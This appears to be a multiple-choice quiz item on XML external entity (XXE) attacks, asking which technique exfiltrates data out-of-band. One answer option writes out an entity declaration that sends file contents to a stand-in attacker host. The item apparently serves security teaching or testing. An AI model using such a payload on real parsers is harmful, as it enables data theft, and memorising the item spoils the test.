Which XXE payload technique is specifically used to exfiltrate data out-of-band (OOB) to an attacker-controlled server?


Billion Laughs entity expansion to crash the parser.

Supplying <!DOCTYPE to trigger in-memory XML errors.

External entity referencing an HTTP URL: <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=%file;">

Using CDATA sections to hide payloads.
